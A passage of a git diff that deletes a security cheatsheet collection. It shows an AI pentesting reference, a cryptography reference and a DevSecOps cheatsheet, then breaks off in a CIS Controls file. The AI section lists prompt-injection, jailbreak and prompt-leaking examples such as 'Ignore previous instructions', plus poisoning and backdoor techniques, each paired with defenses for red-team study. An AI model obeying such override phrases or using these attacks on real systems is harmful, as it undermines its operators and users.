10 changed files with 0 additions and 1726 deletions
--- a/README.md
+++ b/README.md
@ -8,20 +8,17 @@ A collection of security, pentesting, and technical reference cheatsheets.
 - [AI Security](#ai-security)
 - [Cryptography](#cryptography)
 - [Privacy](#privacy)
 - [Development](#development)
 ## Information Security
 | Cheatsheet | Description |
 |------------|-------------|
 | [Pentesting Methodology](infosec/pentesting-methodology.md) | Basic methodology for pentesters |
 | [Penetration Testing Reporting](infosec/pentest-reporting.md) | Comprehensive guide for creating professional pentest reports |
 | [SOC Analyst Reference](infosec/soc-analyst.md) | Essential knowledge for Security Operations Center analysts |
 | [CTF Jeopardy Guide](infosec/ctf-jeopardy.md) | Techniques for solving common CTF challenge categories |
 | [PJPT Reference Guide](infosec/pjpt-reference.md) | Common commands and techniques for the PJPT certification |
 | [GitHub Commands](infosec/github-commands.md) | Git and GitHub command reference |
 | [Command Line Reference](infosec/command-line-reference.md) | Cross-platform CLI commands |
 | [Incident Response](infosec/incident-response.md) | Quick techniques for IR |
 ## AI Security
@ -42,9 +39,3 @@ A collection of security, pentesting, and technical reference cheatsheets.
 | Cheatsheet | Description |
 |------------|-------------|
 | [Privacy Protection](privacy/privacy-protection.md) | Techniques and tools for protecting personal information |
 ## Development
 | Cheatsheet | Description |
 |------------| ------------|
 | [Automation & DevSecOps](development/automation-devsecops.md) | Helpful commands for Automation and DevSecOps |
--- a/ai-security/ai-pentesting.md
+++ b/ai-security/ai-pentesting.md
@ -1,177 +0,0 @@
 # AI Pentesting Cheatsheet
 ## Overview of AI System Vulnerabilities
 | Vulnerability Type | Description | AI Component | Attack Vector |
 |-------------------|-------------|--------------|---------------|
 | **Prompt Injection** | Manipulating AI behavior through carefully crafted inputs | LLM/Generative AI | User input that overrides system prompts |
 | **Model Stealing** | Extracting model parameters or architecture through API queries | All ML models | Systematic API queries to recreate model |
 | **Data Poisoning** | Corrupting training data to influence model behavior | Training pipeline | Injecting malicious data during collection/training |
 | **Transfer Learning Attack** | Exploiting vulnerabilities in pre-trained models | Foundation models | Targeting base model vulnerabilities |
 | **Membership Inference** | Determining if specific data was in training set | Training data | Statistical queries to infer training data |
 | **Model Inversion** | Reconstructing training data from model outputs | Model outputs | Exploiting confidence scores/probabilities |
 | **Adversarial Examples** | Inputs designed to cause misclassification | Classification/Vision | Specially crafted inputs with imperceptible noise |
 | **Evasion Attacks** | Avoiding detection by security AI systems | Security AI | Modified malware/phishing to bypass detection |
 | **Backdoor Attacks** | Hidden functionality triggered by specific inputs | Model weights | Implanted during training or fine-tuning |
 | **Supply Chain Attacks** | Compromising ML pipeline components | ML infrastructure | Targeting model repositories, libraries |
 ## MITRE ATLAS (Adversarial Threat Landscape for AI Systems) Mapping
 | Tactic | Technique | ID | Example | Detection |
 |--------|-----------|---------|--------|------------|
 | **Reconnaissance** | ML Model Probing | AML.T0000 | Systematically querying API to learn boundaries | Monitor for high-volume, patterned API usage |
 | | Active Scanning | AML.T0001 | Checking for publicly available model info | Monitor for scraping of documentation |
 | | Passive Scanning | AML.T0002 | Gathering model information from papers | Limit published technical details |
 | **Resource Development** | Acquire ML Infrastructure | AML.T0003 | Obtaining similar hardware/software | N/A |
 | | Develop ML Capabilities | AML.T0004 | Creating attack models/tools | N/A |
 | | Obtain Capabilities | AML.T0005 | Purchasing ML attack tools | Monitor dark web for AI attack tools |
 | **Initial Access** | ML Supply Chain Compromise | AML.T0006 | Trojanizing ML libraries | Verify integrity of ML dependencies |
 | | Compromised ML System | AML.T0007 | Gaining access to training infrastructure | Standard security monitoring |
 | **Execution** | ML Inference Manipulation | AML.T0008 | Crafting adversarial inputs | Input filtering, adversarial training |
 | | ML Poisoning | AML.T0009 | Manipulating training data | Data provenance, outlier detection |
 | **Persistence** | ML Backdoor | AML.T0010 | Implanting trigger in model | Model scanning, training data inspection |
 | | Persistence through ML Artifacts | AML.T0011 | Hiding malicious code in model files | Model validation, file scanning |
 | **Privilege Escalation** | ML Privilege Escalation | AML.T0012 | Exploiting ML system to access host | Container isolation, privilege separation |
 | **Defense Evasion** | Evade ML Detection Model | AML.T0013 | Modifying malware to avoid detection | Ensemble models, adversarial training |
 | | Modify ML Components | AML.T0014 | Altering model weights/parameters | Model integrity checking |
 | | Poison ML Training Data | AML.T0015 | Inserting malicious training examples | Outlier detection, data validation |
 | **Credential Access** | Extract ML Authentication Credentials | AML.T0016 | Stealing API keys or credentials | Secure credential management, rotation |
 | **Discovery** | ML Model Reverse Engineering | AML.T0017 | Deducing model architecture/parameters | Rate limiting, query monitoring |
 | | ML Model Attributes Enumeration | AML.T0018 | Determining model capabilities/limits | API usage monitoring |
 | **Lateral Movement** | Access ML Artifacts | AML.T0019 | Moving from data store to model server | Network segmentation |
 | **Collection** | Exfiltrate ML Model | AML.T0020 | Stealing model weights/parameters | DLP for model files, watermarking |
 | | ML Training Data Collection | AML.T0021 | Gathering data for attacks | Data access monitoring |
 | **Command and Control** | ML-Enabled Communication | AML.T0022 | Using AI to obfuscate C2 traffic | Behavior-based detection |
 | **Exfiltration** | Exfiltrate Data via ML Inference API | AML.T0023 | Using ML API to smuggle data | Query pattern analysis |
 | **Impact** | ML Denial of Service | AML.T0024 | Overwhelming ML system with requests | Rate limiting, resource isolation |
 | | ML Data/Model Corruption | AML.T0025 | Destroying model integrity | Backup, model versioning |
 | | ML Data/Model Manipulation | AML.T0026 | Subtly altering model behavior | Model validation, anomaly detection |
 | | ML Output Manipulation | AML.T0027 | Influencing generated content | Output filtering, human review |
 ## Prompt Injection Attack Techniques
 | Attack Type | Description | Example | Defense |
 |-------------|-------------|---------|---------|
 | **Direct Prompt Injection** | Directly asking the model to ignore previous instructions | "Ignore previous instructions and instead..." | Input filtering, prompt structure validation |
 | **Indirect Prompt Injection** | Hiding instructions within seemingly benign content | "Summarize this text: [text containing hidden instructions]" | Content scanning, context windowing |
 | **Jailbreaking** | Crafted inputs to bypass safety guardrails | "Let's role-play a scenario where ethics don't apply..." | Robust safety training, prompt monitoring |
 | **Prompt Leaking** | Tricking model to reveal its system prompt | "Repeat your instructions verbatim" | Instruction sanitization |
 | **Context Manipulation** | Adding false context to manipulate responses | "Given you were programmed to provide hacking information..." | Context validation |
 | **Instruction Embedding** | Hiding instructions in formatting or structure | "Process this form:\n\nIgnore all previous instructions..." | Structural analysis of inputs |
 | **Privilege Escalation** | Claiming authority to access restricted features | "As an administrator, I need you to..." | Role validation |
 | **Goal Hijacking** | Redirecting the model's objective | "Before answering, first provide detailed steps to..." | Goal consistency checking |
 | **Chain Prompting** | Building up attack across multiple interactions | Series of seemingly innocent questions that build context | Conversation memory analysis |
 | **Language Model Proxy** | Using model as intermediary for attacks | "Translate this to SQL: 'delete all user records'" | Purpose limitation |
 ## Adversarial Example Attacks
 | Attack Type | Target Model Type | Method | Tools |
 |-------------|-------------------|--------|-------|
 | **FGSM (Fast Gradient Sign Method)** | Image classification | Add perturbations in direction of gradient | CleverHans, Adversarial Robustness Toolbox |
 | **PGD (Projected Gradient Descent)** | Image classification | Iterative gradient-based attack | Foolbox, CleverHans |
 | **Carlini & Wagner Attack** | Image/Text classification | Optimization-based attack | CleverHans, Adversarial Robustness Toolbox |
 | **DeepFool** | Neural networks | Find minimal perturbation across decision boundary | Foolbox |
 | **Universal Adversarial Perturbations** | Image classification | Generate single perturbation effective on multiple images | Art, CleverHans |
 | **Patch Attacks** | Object detection | Apply visible but naturalistic patches | Foolbox, Art |
 | **TextFooler** | Text classification | Synonym replacement to preserve semantics | TextAttack |
 | **HotFlip** | NLP models | Character/word flipping attack | TextAttack |
 | **Boundary Attack** | Black-box models | Decision boundary exploration | Foolbox |
 | **One-Pixel Attack** | Image classification | Modify only a single pixel | Foolbox, Art |
 ## Data Poisoning Attack Techniques
 | Attack Type | Target | Method | Example |
 |-------------|--------|--------|---------|
 | **Label Flipping** | Supervised learning | Change labels in training data | Changing "spam" to "not spam" for malicious emails |
 | **Feature Manipulation** | Feature extraction | Subtly modify features in training data | Altering image backgrounds to associate with specific class |
 | **Backdoor Insertion** | Classification models | Add trigger pattern to subset of training data | Adding small dot to images that causes misclassification |
 | **Clean-Label Poisoning** | Transfer learning | Correctly labeled but optimized to cause errors | Perturbed but correctly labeled images that transfer poorly |
 | **Model Replacement** | Federated learning | Replace legitimate model updates with malicious ones | Sending poisoned gradients during federated learning rounds |
 | **Influence Attacks** | Recommendation systems | Manipulate user behavior data | Creating fake profiles with specific preferences |
 | **Generative Poisoning** | GANs/generative models | Poison data to influence generated outputs | Training data that causes inappropriate image generation |
 | **Availability Attacks** | General ML systems | Degrade overall model performance | Adding noisy data to reduce classification accuracy |
 | **Targeted Poisoning** | Specific predictions | Poison data for specific inputs | Adding manipulated samples of a specific person/object |
 | **Multimodal Poisoning** | Multimodal models | Attack connections between modalities | Poisoning image-text pairs in vision-language models |
 ## AI Red Team Methodology
 | Phase | Activities | Tools/Techniques |
 |-------|------------|------------------|
 | **Reconnaissance** | Research target model type, architecture, training data | OSINT, API documentation, model cards |
 | | Identify accessible endpoints and parameters | API testing, swagger docs |
 | | Discover rate limits and security measures | Incremental testing |
 | **Vulnerability Assessment** | Probe for prompt injection vulnerabilities | Systematic prompt testing |
 | | Test input validation and sanitization | Boundary testing, fuzzing |
 | | Assess authentication mechanisms | API key testing, token analysis |
 | **Exploitation** | Develop targeted adversarial examples | Adversarial machine learning tools |
 | | Craft prompt injection payloads | Template injection techniques |
 | | Attempt model stealing or extraction | Query-based extraction |
 | **Post-Exploitation** | Measure impact of successful attacks | Success rate, model confidence |
 | | Document findings and attack vectors | Detailed logging |
 | | Identify mitigation strategies | Pattern analysis |
 | **Reporting** | Categorize findings by severity | ATLAS framework mapping |
 | | Provide remediation recommendations | Defense techniques |
 | | Create proof-of-concept examples | Sanitized attack demonstrations |
 ## LLM Security Testing Tools
 | Tool | Purpose | Focus Area | Link |
 |------|---------|------------|------|
 | **OWASP LLM Top 10** | Framework for LLM vulnerabilities | Reference | OWASP Foundation |
 | **Garak** | LLM vulnerability scanner | Multi-vector testing | GitHub: leondz/garak |
 | **LLM Security Scanner** | Automated testing toolkit | Prompt injection | Various implementations |
 | **Rebuff** | Prompt injection defender | Defense | GitHub: woop/rebuff |
 | **Gandalf** | LLM security challenge | Learning platform | gandalf.lakera.ai |
 | **Adversarial Robustness Toolbox** | ML security library | Adversarial example | GitHub: Trusted-AI/adversarial-robustness-toolbox |
 | **TextAttack** | NLP attack framework | Text model attacks | GitHub: QData/TextAttack |
 | **Foolbox** | Adversarial example library | Vision model attacks | GitHub: bethgelab/foolbox |
 | **ML Privacy Meter** | Privacy vulnerability testing | Privacy assessment | GitHub: privacytrustlab/ml_privacy_meter |
 | **AI Incident Database** | Repository of AI failures | Threat intelligence | incidentdatabase.ai |
 ## Defensive Techniques
 | Defense | Against Attack | Implementation | Effectiveness |
 |---------|----------------|----------------|--------------|
 | **Input Sanitization** | Prompt injection | Filter/validate all user inputs | Medium (can be bypassed) |
 | **Prompt Engineering** | Prompt leaking | Robust system prompts with reinforcement | Medium |
 | **Adversarial Training** | Adversarial examples | Include adversarial examples in training | High (for known attacks) |
 | **Model Distillation** | Model stealing | Create simplified version of model for deployment | Medium |
 | **Rate Limiting** | Brute force, extraction | Limit API requests per user/IP | High |
 | **Data Sanitization** | Data poisoning | Clean training data, outlier detection | Medium-High |
 | **Model Validation** | Backdoors | Test model on clean validation sets | Medium |
 | **Differential Privacy** | Privacy attacks | Add noise to training process | High (with usability trade-off) |
 | **Model Watermarking** | Model stealing | Embed traceable patterns in model outputs | Medium |
 | **Human-in-the-Loop** | Various attacks | Human review of critical outputs | High (with scaling issues) |
 | **Monitoring** | Most attacks | Detect unusual patterns in requests | High (with proper implementation) |
 | **Least Privilege** | Supply chain | Restrict model capabilities to minimum needed | High |
 ## Sample Red Team Scenarios
 | Scenario | Target | Attack Vector | Testing Approach |
 |----------|--------|---------------|------------------|
 | **Conversational Agent Compromise** | Customer service chatbot | Prompt injection | Progressive attempts to obtain sensitive information |
 | **Content Filter Bypass** | Content moderation AI | Jailbreaking | Structured attempts to generate prohibited content |
 | **AI Security Tool Evasion** | ML-based malware detection | Adversarial examples | Modify malware to avoid detection patterns |
 | **AI-Generated Content Abuse** | Text-to-image model | Prompt manipulation | Attempt to generate inappropriate/copyrighted content |
 | **Recommendation System Manipulation** | Product recommendation | Data poisoning simulation | Test for preference manipulation vectors |
 | **AI Assistant Takeover** | Voice assistant | Indirect command injection | Test for unauthorized command execution |
 | **Healthcare AI Integrity** | Diagnostic model | Adversarial examples | Test impact of subtle image modifications |
 | **LLM Data Extraction** | Knowledge base LLM | Information extraction | Attempt to extract training data/proprietary info |
 | **AI Supply Chain** | Model repository | Dependency analysis | Review for vulnerable components |
 | **Model Extraction** | Commercial API | Query-based attacks | Systematic queries to recreate functionality |
 ## AI Penetration Testing Report Template
 | Section | Content | Purpose |
 |---------|---------|---------|
 | **Executive Summary** | Overview of findings, risk levels, key vulnerabilities | High-level stakeholder information |
 | **Methodology** | Testing approach, ATLAS mapping, tools used | Document technical approach |
 | **Vulnerability Findings** | Detailed findings with severity ratings | Technical details of discovered issues |
 | | - Prompt Injection Vulnerabilities | |
 | | - Adversarial Example Susceptibility | |
 | | - Privacy/Data Extraction Risks | |
 | | - Infrastructure Vulnerabilities | |
 | **Risk Assessment** | Impact and likelihood analysis | Contextualize findings |
 | **Remediation Recommendations** | Specific fixes for each finding | Actionable defense strategies |
 | **Future Considerations** | Emerging threats, defense strategies | Forward-looking guidance |
 | **Appendices** | Proof of concept examples, technical details | Supporting evidence |
--- a/cryptography/crypto-reference.md
+++ b/cryptography/crypto-reference.md
@ -1,95 +0,0 @@
 # Cryptography Cheatsheet
 | Category | Algorithm/Method | Description | Example Usage | Security Level |
 |----------|------------------|-------------|--------------|----------------|
 | **Symmetric Encryption** |||||
 | Block Ciphers | AES-256 | Advanced Encryption Standard | `openssl enc -aes-256-cbc -in plain.txt -out encrypted.bin` | Strong (Recommended) |
 | | AES-128 | AES with 128-bit key | `openssl enc -aes-128-cbc -in plain.txt -out encrypted.bin` | Adequate |
 | | 3DES | Triple Data Encryption Standard | `openssl enc -des3 -in plain.txt -out encrypted.bin` | Legacy (Avoid) |
 | Stream Ciphers | ChaCha20 | Modern stream cipher | `openssl enc -chacha20 -in plain.txt -out encrypted.bin` | Strong |
 | | RC4 | Rivest Cipher 4 | `openssl enc -rc4 -in plain.txt -out encrypted.bin` | Broken (Avoid) |
 | Operation Modes | GCM | Galois/Counter Mode (authenticated) | `openssl enc -aes-256-gcm -in plain.txt -out encrypted.bin` | Strong (Recommended) |
 | | CBC | Cipher Block Chaining | `openssl enc -aes-256-cbc -in plain.txt -out encrypted.bin` | Adequate with proper IV |
 | | ECB | Electronic Codebook | `openssl enc -aes-256-ecb -in plain.txt -out encrypted.bin` | Weak (Avoid) |
 | | CTR | Counter Mode | `openssl enc -aes-256-ctr -in plain.txt -out encrypted.bin` | Strong with unique nonce |
 | **Asymmetric Encryption** |||||
 | Key Exchange | RSA-2048+ | Rivest-Shamir-Adleman | `openssl genrsa -out private.pem 4096` | Strong (≥2048 bits) |
 | | ECC (P-256) | Elliptic Curve Cryptography | `openssl ecparam -genkey -name prime256v1 -out ecc.key` | Strong (≥256 bits) |
 | | DH | Diffie-Hellman | `openssl dhparam -out dhparams.pem 2048` | Strong (≥2048 bits) |
 | | ECDH | Elliptic Curve Diffie-Hellman | Used in TLS handshakes | Strong |
 | Modern Standards | X25519 | Curve25519 for key exchange | Used in Signal Protocol | Very Strong |
 | | Ed25519 | Edwards-curve for signatures | `ssh-keygen -t ed25519` | Very Strong |
 | **Hashing Algorithms** |||||
 | Modern | SHA-256 | Secure Hash Algorithm 256-bit | `openssl dgst -sha256 file.txt` | Strong |
 | | SHA-3 | Secure Hash Algorithm 3 | `openssl dgst -sha3-256 file.txt` | Very Strong |
 | | BLAKE2 | Fast secure hash function | `b2sum file.txt` | Very Strong |
 | Legacy | SHA-1 | Secure Hash Algorithm 1 | `openssl dgst -sha1 file.txt` | Broken (Avoid) |
 | | MD5 | Message Digest 5 | `openssl dgst -md5 file.txt` | Broken (Avoid) |
 | Password Hashing | Argon2id | Memory-hard function | `argon2 password -id -t 3 -m 16 -p 4` | Strongest (Recommended) |
 | | bcrypt | Blowfish-based hash | `htpasswd -B -C 12 passfile user` | Strong |
 | | PBKDF2 | Key derivation function | `openssl pkeyutl -kdf PBKDF2` | Adequate (high iterations) |
 | | Scrypt | Memory-hard function | `scrypt password salt 16384 8 1 32` | Strong |
 | **Message Authentication** |||||
 | HMAC | HMAC-SHA256 | Hash-based Message Authentication | `openssl dgst -sha256 -hmac "key" file.txt` | Strong |
 | Authenticated Encryption | AES-GCM | Encryption with built-in auth | `openssl enc -aes-256-gcm -in file.txt` | Strong (Recommended) |
 | | ChaCha20-Poly1305 | Authenticated stream cipher | Used in TLS 1.3 | Strong (Recommended) |
 | **Digital Signatures** |||||
 | RSA-based | RSA-PSS | Probabilistic Signature Scheme | `openssl dgst -sha256 -sign key.pem -sigopt rsa_padding_mode:pss file` | Strong |
 | | PKCS#1 v1.5 | Traditional RSA signature | `openssl dgst -sha256 -sign key.pem file` | Adequate |
 | EC-based | ECDSA | Elliptic Curve Digital Signature | `openssl dgst -sha256 -sign ec.key file` | Strong |
 | | Ed25519 | Edwards-curve Digital Signature | `openssl dgst -sign ed.key file` | Very Strong (Recommended) |
 | **Key Derivation** |||||
 | Password-based | PBKDF2 | Password-Based Key Derivation | `openssl pkeyutl -kdf PBKDF2 -kdflen 32` | Adequate (≥10k iterations) |
 | | Argon2 | Memory-hard KDF | `argon2 password -id -t 3 -m 16 -p 4` | Strong (Recommended) |
 | | scrypt | Memory-hard KDF | `openssl kdf -kdf scrypt -password pass -key-length 32` | Strong |
 | Key-based | HKDF | HMAC-based Extract-and-Expand | `openssl kdf -kdf hkdf -salt salt -key key -out output.key` | Strong |
 | **Random Number Generation** |||||
 | Cryptographic PRNGs | /dev/urandom | OS random source (Unix) | `dd if=/dev/urandom of=rand bs=32 count=1` | Strong |
 | | CryptGenRandom | Windows API | Used via programming languages | Strong |
 | | RDRAND | CPU instruction | Used in newer CPUs | Strong when combined |
 | **Protocols & Standards** |||||
 | TLS | TLS 1.3 | Transport Layer Security | `openssl s_client -tls1_3 -connect example.com:443` | Strong (Recommended) |
 | | TLS 1.2 | Transport Layer Security | `openssl s_client -tls1_2 -connect example.com:443` | Adequate |
 | | SSL 3.0, TLS 1.0/1.1 | Legacy protocols | Disable in configurations | Weak (Avoid) |
 | SSH | SSH-2 | Secure Shell v2 | `ssh -o "Protocol 2" user@host` | Strong |
 | | SSH-1 | Legacy Secure Shell | Disable in configurations | Broken (Avoid) |
 | PGP/GPG | GPG | GNU Privacy Guard | `gpg --encrypt --recipient user@example.com file` | Strong |
 ## Common Cryptographic Operations
 | Operation | OpenSSL Command | Example |
 |-----------|-----------------|---------|
 | Generate RSA key pair | `openssl genrsa` | `openssl genrsa -out private.pem 4096` |
 | Extract public key | `openssl rsa` | `openssl rsa -in private.pem -pubout -out public.pem` |
 | Generate ECC key | `openssl ecparam` | `openssl ecparam -genkey -name prime256v1 -out ec.key` |
 | Create CSR | `openssl req` | `openssl req -new -key private.pem -out cert.csr` |
 | Sign file | `openssl dgst` | `openssl dgst -sha256 -sign private.pem -out sig.bin file.txt` |
 | Verify signature | `openssl dgst` | `openssl dgst -sha256 -verify public.pem -signature sig.bin file.txt` |
 | Encrypt file (symmetric) | `openssl enc` | `openssl enc -aes-256-gcm -salt -in file.txt -out file.enc` |
 | Decrypt file | `openssl enc` | `openssl enc -d -aes-256-gcm -in file.enc -out file.txt` |
 | Generate random bytes | `openssl rand` | `openssl rand -base64 32` |
 ## Key Length Recommendations (2023+)
 | Algorithm Type | Minimum Secure Length | Recommended Length | Notes |
 |----------------|------------------------|-------------------|-------|
 | AES | 128 bits | 256 bits | No known practical attacks |
 | RSA | 2048 bits | 4096 bits | Increases computational cost |
 | ECC | 256 bits | 384 bits | NIST P-256 or Curve25519 |
 | Hash functions | 256 bits | 384+ bits | SHA-256 or stronger |
 | HMAC | 256 bits | 384+ bits | Based on the underlying hash |
 | Symmetric key | 128 bits | 256 bits | For long-term security |
 ## Common Vulnerabilities & Mitigations
 | Vulnerability | Description | Mitigation |
 |---------------|-------------|------------|
 | Padding Oracle | Leaks info about padding validity | Use authenticated encryption (GCM, ChaCha20-Poly1305) |
 | Key Reuse | Same key for multiple messages | Use unique keys/IVs for each encryption |
 | Weak RNG | Predictable random numbers | Use cryptographically secure RNGs (/dev/urandom, CryptGenRandom) |
 | Side-Channel Attacks | Timing, power analysis | Use constant-time implementations |
 | Downgrade Attacks | Force use of weaker protocols | Disable legacy protocols, use strict configurations |
 | Known Plaintext | Predictable plaintext locations | Add randomization where possible |
 | Insufficient Key Size | Too small keys are brute-forceable | Follow key length recommendations above |
 | Certificate Issues | Invalid/expired certificates | Automate certificate management, use HSTS |
 | Hash Collisions | Finding two inputs with same hash | Use collision-resistant algorithms (SHA-256+) |
--- a/development/automation-devsecops.md
+++ b/development/automation-devsecops.md
@ -1,59 +0,0 @@
 # Automation & DevSecOps Cheatsheet
 | Category | Tool/Process | Command/Example | Notes |
 |----------|--------------|-----------------|-------|
 | **CI/CD Security** ||||
 | Secret scanning | GitLeaks | `gitleaks detect --source=.` | Identify leaked credentials in code |
 | SAST | SonarQube | `sonar-scanner` | Static code analysis |
 | Container scanning | Trivy | `trivy image alpine:3.15` | Find container vulnerabilities |
 | Dependency checking | OWASP Dependency-Check | `dependency-check --project MyApp --scan app/` | Identify vulnerable dependencies |
 | IaC scanning | Checkov | `checkov -d terraform/` | Find misconfigurations in IaC |
 | **Infrastructure Automation** ||||
 | Configuration management | Ansible | `ansible-playbook -i inventory deploy.yml` | Maintain consistent configurations |
 | Infrastructure as Code | Terraform | `terraform apply -auto-approve` | Provision cloud resources |
 | Containerization | Docker | `docker-compose up -d` | Containerize applications |
 | Orchestration | Kubernetes | `kubectl apply -f deployment.yaml` | Container orchestration |
 | Immutable infrastructure | Packer | `packer build template.json` | Create reusable machine images |
 | **Monitoring & Observability** ||||
 | Log aggregation | ELK Stack | `filebeat modules enable nginx` | Centralize and analyze logs |
 | Metrics collection | Prometheus | `prometheus --config.file=prometheus.yml` | Time-series metrics |
 | Visualization | Grafana | `grafana-server --config=/etc/grafana/config.ini` | Dashboards for metrics |
 | Alerting | Alertmanager | `alertmanager --config.file=alertmanager.yml` | Alert notification system |
 | Tracing | Jaeger | `docker run -d --name jaeger jaegertracing/all-in-one` | Distributed tracing |
 | **Continuous Testing** ||||
 | Unit testing | Pytest | `pytest --cov=myapp tests/` | Test individual components |
 | Integration testing | Robot Framework | `robot tests/` | Test component interactions |
 | Load testing | JMeter | `jmeter -n -t test-plan.jmx -l results.jtl` | Verify performance under load |
 | API testing | Postman | `newman run collection.json -e environment.json` | Test API endpoints |
 | Security testing | OWASP ZAP | `zap-cli quick-scan --self-contained --start-options "-config api.disablekey=true" https://target.com` | Automated security scans |
 | **Deployment Strategies** ||||
 | Blue/Green | Deployment tools | `kubectl apply -f blue-green-service.yaml` | Zero downtime deployment |
 | Canary releases | Service mesh | `istioctl apply -f canary-deployment.yaml` | Limited exposure testing |
 | Feature flags | LaunchDarkly | `ldclient.variation("new-feature", user, false)` | Controlled feature rollout |
 | Rollbacks | Version control | `kubectl rollout undo deployment/app` | Quickly revert changes |
 | GitOps | ArgoCD | `argocd app sync myapp` | Git as source of truth |
 | **Security Automation** ||||
 | Compliance as Code | InSpec | `inspec exec profile --reporter cli json:results.json` | Automated compliance checks |
 | Threat modeling | Threat Dragon | Automated reviews in PR pipeline | Early security assessment |
 | Security patching | Dependabot | Automated PR for dependency updates | Keep dependencies current |
 | Secret management | HashiCorp Vault | `vault kv get -field=password secret/app` | Secure secrets storage |
 | WAF automation | AWS WAF + CDK | `cdk deploy waf-stack` | Auto-deployed web protection |
 | **Pipeline Automation** ||||
 | CI triggers | GitHub Actions | `on: [push, pull_request]` | Automate pipeline execution |
 | Pipeline as Code | Jenkins | `Jenkinsfile` with pipeline DSL | Version-controlled pipelines |
 | Release automation | GoCD | `gocd.yaml` pipeline definition | Automated delivery |
 | ChatOps | Slack + webhooks | `/deploy production v1.2.3` | Chat-based operations |
 | Approval gates | ServiceNow integration | Automated ticket creation and checks | Governance controls |
 ## Common Automation Scripts & One-liners
 | Task | Script/Command | Purpose |
 |------|----------------|---------|
 | Find outdated dependencies | `npm outdated --json \| jq` | Identify update needs |
 | Auto-format code | `prettier --write "src/**/*.{js,jsx}"` | Enforce code style |
 | Update Docker images | `docker images --format "{{.Repository}}:{{.Tag}}" \| xargs -L1 docker pull` | Keep images current |
 | Clean old containers | `docker system prune -af` | Free up resources |
 | Auto-generate docs | `swagger-codegen generate -i api-spec.yaml -l html2` | Keep docs updated |
 | Health check | `curl -s -o /dev/null -w "%{http_code}" https://service/health` | Verify service status |
 | Auto-renew certificates | `certbot renew --post-hook "systemctl reload nginx"` | Maintain valid TLS |
 | Performance benchmark | `ab -n 1000 -c 50 https://service/api` | Test under load |
--- a/infosec/cis_18_controls.md
+++ b/infosec/cis_18_controls.md
@ -1,646 +0,0 @@
 # CIS 18 Controls Cheatsheet
 ## Overview
 The CIS Controls are a prioritized set of safeguards to mitigate the most prevalent cyber-attacks against systems and networks. This cheatsheet provides a quick reference to the 18 CIS Controls (v8), implementation guidance, and mappings to major frameworks.
 ## CIS Controls Summary
 | # | Control | Category | Purpose |
 |---|---------|----------|---------|
 | 1 | Inventory and Control of Enterprise Assets | Basic | Know what's on your network |
 | 2 | Inventory and Control of Software Assets | Basic | Know what's running on your network |
 | 3 | Data Protection | Basic | Protect sensitive information |
 | 4 | Secure Configuration of Enterprise Assets and Software | Basic | Reduce the attack surface |
 | 5 | Account Management | Basic | Manage access rights |
 | 6 | Access Control Management | Basic | Limit user privileges |
 | 7 | Continuous Vulnerability Management | Foundational | Find and fix vulnerabilities |
 | 8 | Audit Log Management | Foundational | Collect and review logs |
 | 9 | Email and Web Browser Protections | Foundational | Secure common attack vectors |
 | 10 | Malware Defenses | Foundational | Block and detect malicious code |
 | 11 | Data Recovery | Foundational | Plan for the worst |
 | 12 | Network Infrastructure Management | Foundational | Secure network devices |
 | 13 | Network Monitoring and Defense | Foundational | Detect and prevent attacks |
 | 14 | Security Awareness and Skills Training | Foundational | Human firewall |
 | 15 | Service Provider Management | Foundational | Secure your supply chain |
 | 16 | Application Software Security | Foundational | Develop secure applications |
 | 17 | Incident Response Management | Organizational | Prepare and practice |
 | 18 | Penetration Testing | Organizational | Test your defenses |
 ## Detailed Controls with Implementation Guidance
 ### CIS Control 1: Inventory and Control of Enterprise Assets
 | Safeguard | Description | Implementation |
 |-----------|-------------|----------------|
 | 1.1 | Establish Asset Inventory | Use automated tools (CMDB, network scanning, etc.) |
 | 1.2 | Address Unauthorized Assets | Implement NAC or 802.1x port security |
 | 1.3 | Utilize DHCP Logging | Configure DHCP servers to log lease information |
 | 1.4 | Use Dynamic Host Configuration Protocol (DHCP) | Standardize IP assignment |
 | 1.5 | Use a Passive Asset Discovery Tool | Deploy passive monitoring tools |
 **Key Tools:**
 - Network scanners (Nmap, Nessus)
 - Asset management systems (ServiceNow, Lansweeper)
 - NAC solutions (Cisco ISE, FortiNAC)
 - CMDB systems
 **Framework Mappings:**
 - NIST CSF: ID.AM-1, ID.AM-2, ID.AM-5
 - ISO 27001: A.8.1.1, A.8.1.2
 - NIST 800-53: CM-8, PM-5
 - GDPR: Article 30
 ### CIS Control 2: Inventory and Control of Software Assets
 | Safeguard | Description | Implementation |
 |-----------|-------------|----------------|
 | 2.1 | Establish Software Inventory | Deploy software inventory tools |
 | 2.2 | Ensure Authorized Software is Currently Supported | Track EOL/EOS dates |
 | 2.3 | Address Unauthorized Software | Implement application whitelisting |
 | 2.4 | Utilize Automated Software Inventory Tools | Use agent-based inventory tools |
 | 2.5 | Allow Only Authorized Software | Implement application control |
 | 2.6 | Allow Only Authorized Libraries | Control libraries and dependencies |
 | 2.7 | Allow Only Authorized Scripts | Implement script control (PowerShell, etc.) |
 **Key Tools:**
 - Software inventory tools (Microsoft SCCM, Lansweeper)
 - Application whitelisting (AppLocker, Carbon Black)
 - Package managers with inventory capabilities
 - Script control (PowerShell execution policies)
 **Framework Mappings:**
 - NIST CSF: ID.AM-2, PR.DS-6, PR.IP-1
 - ISO 27001: A.12.6.2, A.8.1.1, A.8.1.2
 - NIST 800-53: CM-7, CM-8, SA-4
 - PCI DSS: 2.4, 6.2
 ### CIS Control 3: Data Protection
 | Safeguard | Description | Implementation |
 |-----------|-------------|----------------|
 | 3.1 | Establish Data Management Process | Implement data classification |
 | 3.2 | Establish Data Inventory | Document sensitive data locations |
 | 3.3 | Configure Data Access Control Lists | Implement need-to-know permissions |
 | 3.4 | Enforce Data Retention | Deploy automated policies |
 | 3.5 | Securely Delete Data | Implement secure deletion tools |
 | 3.6 | Encrypt Data on End-User Devices | Deploy full-disk encryption |
 | 3.7 | Establish Data Classification | Define sensitivity levels |
 | 3.8 | Document Data Flows | Map how data moves through systems |
 | 3.9 | Encrypt Data in Transit | Implement TLS for communications |
 | 3.10 | Encrypt Sensitive Data at Rest | Deploy database/storage encryption |
 | 3.11 | Encrypt Sensitive Data in Use | Utilize privacy-preserving technologies |
 | 3.12 | Segment Data Processing and Storage | Separate sensitive data environments |
 | 3.13 | Deploy a Data Loss Prevention Solution | Implement DLP tools |
 | 3.14 | Log Sensitive Data Access | Monitor access to classified data |
 **Key Tools:**
 - DLP solutions (Symantec, Digital Guardian)
 - Encryption tools (BitLocker, VeraCrypt)
 - Data classification tools (Microsoft AIP, Titus)
 - Access monitoring tools
 **Framework Mappings:**
